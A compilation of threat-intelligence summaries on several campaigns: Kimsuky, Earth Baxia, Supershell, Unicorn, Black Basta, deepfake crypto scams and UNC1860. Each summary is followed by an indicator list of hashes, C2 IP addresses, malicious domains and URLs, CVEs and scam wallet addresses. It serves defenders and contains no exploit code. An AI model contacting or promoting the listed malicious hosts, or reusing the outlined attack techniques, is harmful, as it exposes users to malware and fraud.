This analysis details a sophisticated cyber attack attributed to the North Korean-linked Kimsuky APT group. The attack begins with an LNK file, leading to the execution of obfuscated VBS scripts. These scripts create scheduled tasks, modify registry keys for persistence, and establish communication with a command and control (C2) server. The malware employs various evasion techniques, including Base64 encoding and Caesar Cipher obfuscation. The ultimate goal appears to be maintaining long-term access to the victim's machine for espionage activities. The report also includes a personal anecdote of the analyst's brief interaction with the C2 server, receiving a single command after hours of waiting.

Type	Indicator
FileHash-MD5	0c3fd7f45688d5ddb9f0107877ce2fbd
FileHash-MD5	37fb639a295daa760c739bc21c553406
FileHash-MD5	4cbafb288263fe76f5e36f1f042be22d
FileHash-MD5	622358469e5e24114dd0eb03da815576
FileHash-MD5	73ed9b012785dc3b3ee33aa52700cfe4
FileHash-SHA1	50e4d8a112e4aad2c984d22f83c80c8723f232da
FileHash-SHA256	41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
IPv4	64.49.14.181

Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC

Earth Baxia, a suspected China-based threat actor, targeted government organizations, telecommunication businesses, and the energy industry in multiple Asia-Pacific countries. The group employed sophisticated techniques, including spear-phishing emails and exploitation of a GeoServer vulnerability (CVE-2024-36401). They deployed customized Cobalt Strike components and a new backdoor called EAGLEDOOR on compromised machines. EAGLEDOOR supports multiple communication protocols for information gathering and payload delivery. The attackers used public cloud services to host malicious files, making tracking difficult. They also utilized techniques like GrimResource and AppDomainManager injection to deploy additional payloads. The campaign affected countries including Taiwan, Philippines, South Korea, Vietnam, Thailand, and potentially China.

Type	Indicator
IPv4	167.172.89.142
CVE	CVE-2024-36401
IPv4	152.42.243.170
IPv4	167.172.84.142
IPv4	188.166.252.85
hostname	static.krislab.site
IPv4	167.172.89.142
FileHash-MD5	249c2d77aa53c36b619bdfbf02a817e5
FileHash-MD5	55689e6075629b68798c1feb2d168516
FileHash-MD5	9bbb096a052ad6e4055b39f2c9216026
FileHash-MD5	9f376a334f9362c6c316a56e2ffd4971
FileHash-MD5	e51f2ea5a877e3638457e01bf46a20e1
FileHash-SHA1	9833566856f924e4a60e4dd6a06bf9859061f4be
FileHash-SHA1	d9b814f53e82f686d84647b7d390804b331f1583
FileHash-SHA1	dce0a4c008ea7c02d768bc7fd5a910e79781f925
FileHash-SHA1	e2b0c45beadff54771a0ad581670a10e76dc4cf1
FileHash-SHA256	04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e
FileHash-SHA256	061bcd5b34c7412c46a3acd100167336685a467d2cbcd1c67d183b90d0bf8de7
FileHash-SHA256	1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee
FileHash-SHA256	1c26d79a841fdca70e50af712f4072fea2de7faf5875390a2ad6d29a43480458
FileHash-SHA256	1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448
FileHash-SHA256	4ad078a52abeced860ceb28ae99dda47424d362a90e1101d45c43e8e35dfd325
FileHash-SHA256	4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54
FileHash-SHA256	6be4dd9af27712f5ef6dc7d684e5ea07fa675b8cbed3094612a6696a40c664ce
FileHash-SHA256	916f3f4b895c8948b504cbf1beccb601ff7cc6e982d2ed375447bce6ecb41534
FileHash-SHA256	9b50e888aaec0e4d105a6f06db168a8a2dcf9ab1f9deeff4b7862463299ab1ca
FileHash-SHA256	b3b8efcaf6b9491c00049292cdff8f53772438fde968073e73d767d51218d189
FileHash-SHA256	c78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc
FileHash-SHA256	cef0d2834613a3da4befa2f56ef91afc9ab82b1e6c510d2a619ed0c1364032b8
FileHash-SHA256	d23dd576f7a44df0d44fca6652897e4de751fdb0becc6b14b754ac9aafc9081c
FileHash-SHA256	d3c1ada67f9fe46dfb11f72c1754667d2ccd0026d48d37b61192e3d0ef369b84
FileHash-SHA256	e9854ab68dad0a744925118bfae4ec6ce9c4b7727e2ad6763aa50b923991de95
IPv4	152.42.243.170
IPv4	167.172.84.142
IPv4	188.166.252.85
domain	visualstudio-microsoft.com
hostname	api.s2cloud-amazon.com
hostname	ms1.hinet.lat
hostname	msa.hinet.ink
hostname	rocean.oca.pics
hostname	static.krislab.site
hostname	static.trendmicrotech.com
hostname	status.s3cloud-azure.com
hostname	us2.s3bucket-azure.online

Supershell Malware Being Distributed to Linux SSH Servers

A Chinese-developed Go-based backdoor called Supershell is targeting poorly managed Linux SSH servers. The malware, which supports multiple platforms, primarily functions as a reverse shell for remote system control. Attackers use dictionary attacks from various IP addresses to gain access, then install Supershell directly or via a downloader script. The malware is downloaded from web and FTP servers. While Supershell is the initial payload for control hijacking, XMRig Monero CoinMiners are often installed alongside it, suggesting cryptocurrency mining as the ultimate goal. To protect against such attacks, administrators should use strong passwords, update systems regularly, and implement security measures like firewalls.

Type	Indicator
IPv4	107.189.8.15
FileHash-MD5	4ee4f1e7456bb2b3d13e93797b9efbd3
FileHash-MD5	5ab6e938028e6e9766aa7574928eb062
FileHash-MD5	e06a1ba2f45ba46b892bef017113af09
FileHash-SHA1	4b76040b0d4e2651f0c0a781c336ddebf8b8c057
FileHash-SHA1	a65ff070743b2bf15717e551b4be4e788fb25c08
FileHash-SHA1	c4e0241a4276cb15c95b52c673328de8abcf04b4
FileHash-SHA256	157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff
FileHash-SHA256	23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa
FileHash-SHA256	cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15
IPv4	45.15.143.197

Unicorn: New Spy Scripts Steal Data from Russian Companies

A new malware campaign targeting Russian energy companies, factories, and electronic component suppliers has been detected. The malware, distributed via email attachments or Yandex Disk links, uses RAR archives containing LNK files to download and execute malicious HTA files. These files create VBS scripts that establish persistence through registry keys and scheduled tasks. The scripts copy files from the user's home directory and Telegram data, then exfiltrate them to the attacker's server. Unlike typical attacks, this malware remains active, continuously stealing new and modified files. The campaign shows no clear connection to known threat groups and is detected as Trojan-Spy.VBS.Unicorn.

Type	Indicator
FileHash-MD5	54562bd71d5e0d025297b25d4cacb384
FileHash-MD5	625d30bf6f54d47611f23c514c1dd4d6
FileHash-MD5	8009657da8b46f851ff8e833169d839d
FileHash-MD5	86b4781b1ad041a3696df2efb269718f
FileHash-MD5	c9a941a305f68d726b1e49b965b5812d
URL	https://yandex-drive.petition-change.org/file_preview/commecrial_list.pdf
URL	https://support.petition-change.org/unicorn

Black Basta Ransomware: What You Need to Know

Black Basta is a ransomware-as-a-service group that emerged in April 2022, known for double extortion tactics. They target organizations globally, particularly in North America, Europe, and Australia, affecting over 500 entities across various industries. Initial access is gained through phishing, Qakbot, Cobalt Strike, and vulnerability exploitation. The group uses tools like Mimikatz for credential theft and lateral movement. Their process involves data exfiltration using Rclone, followed by file encryption using the ChaCha20 algorithm. The ransomware disables system defenses, deletes shadow copies, and leaves a ransom note. Black Basta has been linked to the FIN7 threat actor due to similarities in EDR evasion techniques.

Type	Indicator
FileHash-MD5	229ec577744224d4d2fb2091ac253dd8
FileHash-SHA1	497013697aba845b400d23bd774cf2ad09f4dae5
FileHash-SHA256	42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78
CVE	CVE-2020-1472
CVE	CVE-2021-34527
CVE	CVE-2021-42278
CVE	CVE-2021-42287
CVE	CVE-2024-1709
CVE	CVE-2024-26169
FileHash-MD5	00da1d47bc0d09a01121553fa2693f26
FileHash-MD5	0165ff14fa840c0074a7ee5108858f8d
FileHash-MD5	0bf7bc20496143a9f028e77ab47b4698
FileHash-MD5	1ce3b67e179c8420bd5b31e75b4427ca
FileHash-MD5	24544104aaa9931b8cc0c68622864488
FileHash-MD5	2a255e75f72ac142689082437a866c32
FileHash-MD5	2b7fc9dd400d92cc64627115b47a592f
FileHash-MD5	2c383f6fa25eea59fc54e5af19861fba
FileHash-MD5	2d5cefe02cef5d14da7d609f0ccad1bc
FileHash-MD5	2f90cd68e4a92c5151c6e43902397a13
FileHash-MD5	3f400f30415941348af21d515a2fc6a3
FileHash-MD5	403dee0dd3891459b22a8a37828b66b8
FileHash-MD5	470c803b32209fbeb09af80a1b83e6f2
FileHash-MD5	497ef4779c6770e4497adf0bc71655f1
FileHash-MD5	4c54bec464ba0c2b9d522643e1b3ebe7
FileHash-MD5	4e8a7b03ff758f5c75ce992615a14fd0
FileHash-MD5	59db7bd22d4ec503b768ece646205c27
FileHash-MD5	5c421d53680a56650df20fd71485ca0f
FileHash-MD5	640132bbf92eb7c794a5c593fbb362de
FileHash-MD5	6441d7260944bcedc5958c5c8a05d16d
FileHash-MD5	65e8bd5b9128574f1122527b32e1dc21
FileHash-MD5	6785c08d9b83fa5f94b9e07f3434d7ca
FileHash-MD5	6a202e9a95f58938d02385e31d43ed87
FileHash-MD5	6b010dcbc9c09b06b16e6a6cc6387a7b
FileHash-MD5	6d5b9675b68bac95b885b4bb294134a1
FileHash-MD5	6eb89be04f8c1823cfabd28f0f57139b
FileHash-MD5	6f01787f5f644916b2dda5b4295efa4f
FileHash-MD5	6f9f4b7e63692eb7dcbc0957d3e7530e
FileHash-MD5	7688c1b7a1124c1cd9413f4b535b2f44
FileHash-MD5	80ab6a4d16c8137308dea1dc7922bd47
FileHash-MD5	8bae9edbf5b1035cd52ca45b23fee29d
FileHash-MD5	97abffeaa7bdfaa81532bd6028498225
FileHash-MD5	9f727c56a415bf8ffa884ef241bbcd10
FileHash-MD5	a292fee8d8db83711e72c06d6f82562d
FileHash-MD5	a41afe748aed818ab6ac94e81bdde610
FileHash-MD5	adb3cf03e9be744107e61bd7de4c26bd
FileHash-MD5	afa27795c0c86b6afeb138d0fb09506b
FileHash-MD5	b365faebaf416681b5f376c8aa4f4470
FileHash-MD5	b648b7305df49492c44a1280ec2228a0
FileHash-MD5	bc95f228b11fa3b4e91c30d98f9f3bff
FileHash-MD5	c115bbbdb1a61f8c553d74802bfd78fb
FileHash-MD5	cddf2c9ac528b27af98da74dcb8d6ea0
FileHash-MD5	ce99e91e6c2a6defe1a86462870ba321
FileHash-MD5	d1ae751134e04bf6188aaed148409620
FileHash-MD5	d50a3b60eb046c5d7bc6768bd3d7f1b9
FileHash-MD5	d513a09a10122ba8cd6df651aae35fb0
FileHash-MD5	dd611cf3137868795121a44518139ca4
FileHash-MD5	e4d9351749d5b713b3838ba7b1fe8060
FileHash-MD5	e52aa8e50c0ccf883b7ab7f0c36bb878
FileHash-MD5	e7d5201947829fd265a0356771fbeb63
FileHash-MD5	e83d6092439a90af2b4b1db2ad3a9c5a
FileHash-MD5	eaaa577b690501adf1969b71e5636e0f
FileHash-MD5	ed891e4fd173700fac93b3dda30517c9
FileHash-MD5	eff424376edca5680b90ea9fedad163d
FileHash-MD5	f05dac112cd3174c385d10158b6080fb
FileHash-MD5	f309d2c8a5c82367f0fd2be457055813
FileHash-MD5	f74cec233a9609461e7518dd4c90207b
FileHash-MD5	ff2f71dffeb997583fd297695de8c4ae
FileHash-SHA1	0110e12ae768872ea5c1b194dba50cbf74ec4d84
FileHash-SHA1	0b0699b324dfcd6fc40abe39d2eef7d95f1dd782
FileHash-SHA1	1f439569e3c1c14ea9f02235f8f45c49e2764160
FileHash-SHA1	2084ae47dcdda6161c8697e995512448facba37c
FileHash-SHA1	25ce6c74a6f39289717522cad5eacdf5b9f4bae8
FileHash-SHA1	26ab576a0abf7085ecf6321a311a7b3088ee48ae
FileHash-SHA1	328a8793323f11c1d0c5f3ddedf4ae10caafb063
FileHash-SHA1	3c13c1e54d2d7991c1c3452ae89888a8e7a47763
FileHash-SHA1	4090622f0eadc1b420aa5d55e31ca5cd45e05f12
FileHash-SHA1	46257982840493eca90e051ff1749e7040895584
FileHash-SHA1	47dacafb5dace4c5fea931e9a7392f76fdde3e98
FileHash-SHA1	4da6fef533b37a12ed1e357df66802de29c1ab5c
FileHash-SHA1	530f9163be551b7488650542de31cdfd11307d63
FileHash-SHA1	53628c7a155ccb7af1135140083939018d3587f1
FileHash-SHA1	5644a0282ac420c46d3b43fbb409eb9f7842b3af
FileHash-SHA1	579b245a6609903d804f957083b9e0b2ed145f5a
FileHash-SHA1	591d363928f0d5f4629196d60fd899469267da09
FileHash-SHA1	6c90b89aad04f38c584fcee1d47fed9cd79f8ef1
FileHash-SHA1	6fe84c129f76d309032e26aba3c33ba0b64172e8
FileHash-SHA1	7131a6f16aa8534a9cec7e11e37423aea4c09784
FileHash-SHA1	74dbf463be3139a28d9851b3b80c2ecac3e56304
FileHash-SHA1	757932f6038b71c5dbc380a2f28b077b41fbce9b
FileHash-SHA1	79054b409cb1c7a36aafd9a9915f948e2f018734
FileHash-SHA1	796531afd0e828f451786c485f95c4c04084f461
FileHash-SHA1	7a33162908cba6678dc75d688da1f86b54849782
FileHash-SHA1	80a973c3da41c6479cc9d7036090adc1264c02a4
FileHash-SHA1	82f88c1af036181ee4e92a2f9338c152d1ff0c58
FileHash-SHA1	8bf65a11e42b5850e1a5f28513dae1ffc168730e
FileHash-SHA1	8ccac360e2ca37b2fa9f5fa81b22114fb8936120
FileHash-SHA1	8e714d9fdbc27d2aa9abdadc728c219623b1e573
FileHash-SHA1	9171f38c2a3115c3b21aba939a7c55cd9e726d9b
FileHash-SHA1	919c33adb648ce13ee8bd7c11bffbfd836936c00
FileHash-SHA1	92408a8233567f8b10f30f83dfcdd98effe96dca
FileHash-SHA1	9468012acf6df7a0e593f41e0da8123f541277df
FileHash-SHA1	9e24c4e231b93142419ac20e58dd71388f7d8ab7
FileHash-SHA1	a1a698a0bdda712905950ba6414bb1fcabdd8e84
FileHash-SHA1	a44a251e98a905adfedd46edb4541b2a92ae3a20
FileHash-SHA1	a977631006818fc5717b9fbce0609c58080a8ab2
FileHash-SHA1	aa54013aeb502b4a936331deb76a6411f1f1ade7
FileHash-SHA1	ad0e80af469165da713467b13d9a2500ee340427
FileHash-SHA1	b4c5c1e0690fdb1fc8abec8abcec8633d6d5c2bb
FileHash-SHA1	bd0bf9c987288ca434221d7d81c54a47e913600a
FileHash-SHA1	c419ed515b5267bb39870bdedcdd8dd8b172574c
FileHash-SHA1	c69ffb5061ec42c876531f153c5b94302d6d9daf
FileHash-SHA1	cc7ea6bb6787df664adb69022546c42f5f409653
FileHash-SHA1	ce77bd3224f47ae4b8a04bd4b4be91c3550de294
FileHash-SHA1	d32e44f7e04a8c84e7159ed020dcf26b6e51416e
FileHash-SHA1	db497b95c79e41212577db0ba06777b62db209ff
FileHash-SHA1	ddd40fb7335abc4ef736ecc12a909c6329783a05
FileHash-SHA1	e05e9cc2f28bcd17f5285a34db2894bad9ccd53a
FileHash-SHA1	e1caf6484d899e7bb4d0c72e8bea8ff718ff073a
FileHash-SHA1	ec944a8daaa706ff5557d7fedd17bc6ba21bf96d
FileHash-SHA1	f0ae322f5067b20ee89d9826dc806abdd610fb60
FileHash-SHA1	f3d31b5d4bec32a50e8a76430c801d1b8c4e6b70
FileHash-SHA1	f4553d3aa92d4c97353645451c531881e8f0991a
FileHash-SHA1	f502f703f6fc65ab91d80e8d581acaffb6a93695
FileHash-SHA1	fe540dd2ba50edb2ecbef0c0180e732ff2403592
FileHash-SHA1	ff57cda4829978d8b6f7f1f31356f291b37acaa6
FileHash-SHA256	0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a
FileHash-SHA256	05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431
FileHash-SHA256	07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799
FileHash-SHA256	09bc7247b50a166996b667b9a6e696cfbafa203ffcbec46ad0cca27deacd5c25
FileHash-SHA256	0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e
FileHash-SHA256	0bce6dc27d2cbdc231b563427c3489ddc69a0a88012abccd49b32c931dd93a81
FileHash-SHA256	0c964ac2f65f270eb19982b04ae346e72976bdf19b88ffd2308700dcce2b5ec0
FileHash-SHA256	0da309cc4f0d21c76c26d7b4f1c65bb1659908f191edb01d76ff22c8dabef0b1
FileHash-SHA256	0db7a0327192710c403e021cbfc3902d75c729b3ba59d87159bf8f59a151a481
FileHash-SHA256	1391c20a26f248f7c602f20096bf1886cfe7e4d151602a1258a9bbe7c02c1c80
FileHash-SHA256	15abbff9fbce7f5782c1654775938dcd2ce0a8ebd683a008547f8a4e421888c4
FileHash-SHA256	17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90
FileHash-SHA256	17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20
FileHash-SHA256	1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779
FileHash-SHA256	1d040540c3c2ed8f73e04c578e7fb96d0b47d858bbb67e9b39ec2f4674b04250
FileHash-SHA256	1ed076158c8f50354c4dba63648e66c013c2d3673d76ac56582204686aae6087
FileHash-SHA256	1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e
FileHash-SHA256	203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b
FileHash-SHA256	21033cd24a9d775d7daa7bbc5c5b007553f205ac0febb6bae3fa35c700676bda
FileHash-SHA256	3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35
FileHash-SHA256	3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a
FileHash-SHA256	350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd
FileHash-SHA256	360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98
FileHash-SHA256	37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004
FileHash-SHA256	39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead
FileHash-SHA256	3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a
FileHash-SHA256	3eb22320da23748f76f2ce56f6f627e4255bc81d09ffb3a011ab067924d8013b
FileHash-SHA256	449d87ca461823bb85c18102605e23997012b522c4272465092e923802a745e9
FileHash-SHA256	462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7
FileHash-SHA256	46be54f719ee76af15099de6e337b05a0a442c813e815bbed92a71135cfd9ab2
FileHash-SHA256	48976d7bf38cca4e952507e9ab27e3874ca01092eed53d0fde89c5966e9533bb
FileHash-SHA256	4b83aaecddfcb8cf5caeff3cb30fee955ecfc3eea97d19dccf86f24c77c41fc4
FileHash-SHA256	50f45122fdd5f8ca05668a385a734a278aa126ded185c3377f6af388c41788cb
FileHash-SHA256	51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e
FileHash-SHA256	5211ad84270862e68026ce8e6c15c1f8499551e19d2967c349b46d3f8cfcdcaa
FileHash-SHA256	53a06b78d89fe3f981ff32cd7a66f31e099d4bbaac36d7c64ed08d615d314408
FileHash-SHA256	58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd
FileHash-SHA256	5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43
FileHash-SHA256	5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221
FileHash-SHA256	5b6c3d277711d9f847be59b16fd08390fc07d3b27c7c6804e2170f456e9f1173
FileHash-SHA256	5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa
FileHash-SHA256	62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087
FileHash-SHA256	69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944
FileHash-SHA256	699aaea1598a034cde7ed88cd8a8a36fd59447e09bddef566357061774c48a76
FileHash-SHA256	723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224
FileHash-SHA256	7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a
FileHash-SHA256	7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59
FileHash-SHA256	86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737
FileHash-SHA256	882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3
FileHash-SHA256	88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc
FileHash-SHA256	90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7
FileHash-SHA256	96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be
FileHash-SHA256	9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc
FileHash-SHA256	9f188b2f4aa6a5ff3a6fb9048a20c5566f25bd9fb313ed1ba1d332fadd82690f
FileHash-SHA256	9f948af3a30f125dcd24d8a628b3a18c66b3d72baede8496ee735cbdfd9cf0c7
FileHash-SHA256	a199c9d91a1e7c7051ec40f0a3a51143aa9f06af47a2a5f0e2dd235d7e1fe386
FileHash-SHA256	a54fef5fe2af58f5bd75c3af44f1fba22b721f34406c5963b19c5376ab278cd1
FileHash-SHA256	a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6
FileHash-SHA256	ab1a3f8a0510ffa3c043bc200fe357c9ce220ea916f50b8b5b454027ef935c54
FileHash-SHA256	ab913b3bb637447f33add3c7020d353389738e4d532b905caed04c7c7f399277
FileHash-SHA256	acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f
FileHash-SHA256	ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e
FileHash-SHA256	affcb453760dbc48b39f8d4defbcc4fc65d00df6fae395ee27f031c1833abada
FileHash-SHA256	b18b40f513bae376905e259d325c12f9d700ee95f0d908a4d977a80c0420d52e
FileHash-SHA256	b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9
FileHash-SHA256	cce74c82a718be7484abf7c51011793f2717cfb2068c92aa35416a93cbd13cfa
FileHash-SHA256	d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1
FileHash-SHA256	d1949c75e7cb8e57f52e714728817ce323f6980c8c09e161c9e54a1e72777c13
FileHash-SHA256	d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d
FileHash-SHA256	d8e9e06b7adea939bcc135876f4e8a1d3719120e8ad9d4d72812ffd1dbee62fc
FileHash-SHA256	d943a4aabd76582218fd1a9a0a77b2f6a6715b198f9994f0feae6f249b40fdf9
FileHash-SHA256	dc56a30c0082145ad5639de443732e55dd895a5f0254644d1b1ec1b9457f04ff
FileHash-SHA256	dd32c037ed9b72acb6eda4f5193c7f1adc1e7e8d2aefcdd4b16de2f48420e1d3
FileHash-SHA256	df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415
FileHash-SHA256	df9498892ae72f611128c9a8bc57b93964f34cc235f5aaf57fe10fb2b3c69aa3
FileHash-SHA256	e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757
FileHash-SHA256	f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4
FileHash-SHA256	f14c7eacdb39f1decdcf1e68f57c87340968fede1dc0391b2b082f58bd3a3f93
FileHash-SHA256	fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08
FileHash-SHA256	fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f
domain	kekeoamigo.com

Deep Fake Crypto Scams

Cybercriminals exploited the U.S. presidential debate to launch a cryptocurrency scam using deep fake videos. The scam featured fake streams on hijacked YouTube channels, claiming to show Elon Musk and Donald Trump debating Kamala Harris. The videos directed viewers to invest in cryptocurrency during the event. The campaign used well-established YouTube accounts, QR codes linked to deceptive domains, and AI-generated content to lure victims. Multiple researchers reported on this scam, which leveraged current events to boost search rankings. The scammers used 'stream-jacking' to rebrand victim channels as Tesla-related, then posted pre-recorded 'livestreams' with inflated view counts. Scam sites used anti-bot measures and urged victims to link their crypto wallets, with some wallets accumulating significant funds.

Type	Indicator
BitcoinAddress	bc1qfwjgvwesz5k2dpjpvwueze2v009wjh76hn9gfn
BitcoinAddress	bc1qjanjaawj4g0n5xlm03dmpx97u5yrpzljuhuxz8
domain	ark-fund.pro
domain	chaindrop.promo
domain	crypto-participate.com
domain	debate.gift
domain	doubleetherx2.com
domain	eth-up.gift
domain	eth23.io
domain	ether2022.info
domain	eththemerge.net
domain	give-toncoin.com
domain	harryteams.com
domain	promo-tesla.io
domain	takeeth.net
domain	tesladebate.com
domain	teslatrump.org
domain	trump-debate.com
domain	trump-elon.gives
domain	trumptesla.org
domain	usmusk.net
domain	x2-event.pro
domain	x2coinbase.org
hostname	eththemerge.survay.pro

UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks

UNC1860 is an Iranian state-sponsored threat actor likely affiliated with Iran's Ministry of Intelligence and Security. It employs specialized tools and passive backdoors to gain initial access and persistent network access, particularly targeting government and telecommunications sectors in the Middle East. The group's capabilities include providing initial access for other actors, using GUI-operated malware controllers, and maintaining a diverse collection of passive implants. UNC1860's arsenal includes utilities for defense evasion, kernel-level drivers, and custom implementations of encryption methods. The actor demonstrates advanced Windows OS knowledge and reverse engineering skills, making it a formidable threat capable of supporting various objectives from espionage to network attacks.

Type	Indicator
CVE	CVE-2019-0604
FileHash-MD5	07db3058e32fe5f36823dc7092cd7d5b
FileHash-MD5	0c93cac9854831da5f761ee98bb40c37
FileHash-MD5	0c9ff0db00f04fd4c6a9160bffd85a1d
FileHash-MD5	1176381da7dea356f3377a59a6f0e799
FileHash-MD5	126bc1c30fba27f8bf67dce4892b1e8c
FileHash-MD5	14e54ff4805840e656efb8cd38de4751
FileHash-MD5	17b27e6aa0ab6501f11bb4d2e0f829ff
FileHash-MD5	1e6679cd25d1bb127a0bec665adcf21e
FileHash-MD5	1e896f026246872b2feb4f8e3e093815
FileHash-MD5	2398a83f10329a107801d3d23d06f7cb
FileHash-MD5	286bd9c2670215d3cb4790aac4552f22
FileHash-MD5	2cece71e107d12ffd74b2fb24bf339a6
FileHash-MD5	2e803d28809be2a0216f25126efde37b
FileHash-MD5	31f2369d2e38c78f5b3f2035dba07c08
FileHash-MD5	3d5d05f230ae702c04098de512d93d48
FileHash-MD5	3dd829fb27353622eff34be1eabb8f18
FileHash-MD5	4029bc4a06638bb9ac4b8528523b72f6
FileHash-MD5	41f4732ed369f2224a422752860b0bc5
FileHash-MD5	46804472541ed61cc904cd14be18fe1d
FileHash-MD5	490590bfdeeedf44b3ae306409bb0d03
FileHash-MD5	4abcf21b63781a53bbc1aa17bd8d2cbc
FileHash-MD5	4b2c78bb2c439998cff0cc097a14b942
FileHash-MD5	4dd6250eb2d368f500949952eb013964
FileHash-MD5	4de802f7e61cb8c820a02e042b58b215
FileHash-MD5	57c916da83cc634af22bde0ad44d0db3
FileHash-MD5	57cd8e220465aa8030755d4009d0117c
FileHash-MD5	6626dbe74acd15d06ff6900071ef240c
FileHash-MD5	69fd67c115349abb4a313230a1692642
FileHash-MD5	6d3041b89484c273376e5189e190d235
FileHash-MD5	73fb0fe5cd96a14a4f85639223aec6a8
FileHash-MD5	7b2fa099d51fa3885766f6d60d768748
FileHash-MD5	7f5f5f290910d256e6b012f898c88bf3
FileHash-MD5	85427a8a47c4162b48d8dfb37440665d
FileHash-MD5	8d070a93a45ed8ba6dba6bfbe0d084e7
FileHash-MD5	929b12bc9f9e5f8e854de1d46ebf40d9
FileHash-MD5	952482949f495fb66e493e441229ae4b
FileHash-MD5	a038975255d3dda636d86ccd307f7838
FileHash-MD5	a3ea0d13848a104c28d035a9d518acc2
FileHash-MD5	a500561c0b374816972094c2aa90da2a
FileHash-MD5	a65ee1a82975ee4c8d4e70219e1bfff5
FileHash-MD5	a7693e399602eb79db537c5022dd1e01
FileHash-MD5	a90236e4962620949b720f647a91f101
FileHash-MD5	a991bdbf1e36d7818d7a340a35a4ea26
FileHash-MD5	b219672bcd60ce9a81b900217b3b5864
FileHash-MD5	b26d54b7da7b2bf600104f69da4ea00f
FileHash-MD5	b34883fb1630db43e06a38cebfa0bce2
FileHash-MD5	b4b1e285b9f666ae7304a456da01545e
FileHash-MD5	bd6464f12bb6f7f02b6ffebb363d8e5f
FileHash-MD5	c11a4e4a2d484513f79bd127a0387b0c
FileHash-MD5	c21eefc65cda49f17ddd1d243a7bffb5
FileHash-MD5	c50ae2c4b76f0d5724ec240568c78c4f
FileHash-MD5	c517519097bff386dc1784d98ad93f9d
FileHash-MD5	c57e59314aee7422e626520e495effe0
FileHash-MD5	c8fa0ce3ae6a13af640607ea606c55f9
FileHash-MD5	c90ec587e3333dabb647ebc182673460
FileHash-MD5	ca3f0d25f7da0e8cde8e1f367451c77a
FileHash-MD5	caffdb648a0a68cd36694f0f0c7699d7
FileHash-MD5	ce537dd649a391e52c27a3f88a0a8912
FileHash-MD5	d1ce3117060e85247145c82005dda985
FileHash-MD5	d1e45afbfd3424612b4a4218cc7357ef
FileHash-MD5	d87ca3f830b8b53fde358bb64900f6af
FileHash-MD5	d9719f6738dbfaa21be7f184512fe074
FileHash-MD5	da0085a97c38ead734885e5cced1847f
FileHash-MD5	e67687b4443f58d2b0a465e3af3caffe
FileHash-MD5	e86e885e6c96ac72482741d8696c17fb
FileHash-MD5	efe8043e1b4214640c5f7b5ddf737653
